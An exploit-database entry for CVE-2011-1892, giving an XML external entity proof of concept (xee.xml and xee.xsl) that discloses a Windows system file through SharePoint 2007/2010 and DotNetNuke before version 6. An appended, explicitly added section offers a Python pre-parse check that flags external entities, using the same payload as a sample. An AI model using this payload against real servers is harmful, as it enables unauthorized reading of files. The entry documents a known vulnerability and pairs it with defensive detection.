0day Today Exploits Market and 0day Exploits Database

File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6

Author: Nicolas Gregoire
Risk: Security Risk Unsorted
0day-ID: 0day-ID-16953
Category: web applications
Date add: 19-09-2011
Platform: windows

Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE: CVE-2011-1892
 
poc filename: xee.xml
 
<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>
 
poc filename: xee.xsl
 
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:template match="/">
        <xsl:apply-templates/>
                <xsl:value-of select="doc"/>
        </xsl:template>
</xsl:stylesheet>
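
A defensive pre-parse check for the document shape used in xee.xml, added here as an example; it is not part of the original advisory or of either affected product. The function names and both sample documents are constructed for illustration, and the check assumes untrusted XML can be inspected before it reaches the XML/XSLT processing step.

```python
import xml.parsers.expat

# Constructed sample with the same shape as the xee.xml PoC on this page.
XEE_SAMPLE = rb'''<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>'''

# Constructed benign sample: an internal entity only, nothing external.
BENIGN_SAMPLE = b'<!DOCTYPE doc [<!ENTITY greet "hello">]><doc>&greet;</doc>'


def find_external_references(data: bytes):
    """Return (kind, name, system_id) for each external reference in the DTD.

    expat itself never fetches external entities; with no
    ExternalEntityRefHandler installed they are skipped, so this
    inspection does not touch the file system or the network.
    """
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # <!DOCTYPE doc SYSTEM "..."> pulls in an external DTD subset.
        if system_id is not None or public_id is not None:
            findings.append(("external-dtd", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external ones an identifier.
        if value is None and (system_id is not None or public_id is not None):
            kind = "parameter-entity" if is_param else "general-entity"
            findings.append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return findings


def is_safe_to_transform(data: bytes) -> bool:
    """Gate for untrusted XML before it is handed to an XSLT processor."""
    try:
        return not find_external_references(data)
    except xml.parsers.expat.ExpatError:
        return False  # malformed input is rejected rather than passed on


if __name__ == "__main__":
    print(find_external_references(XEE_SAMPLE))
    print(is_safe_to_transform(BENIGN_SAMPLE))
```
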


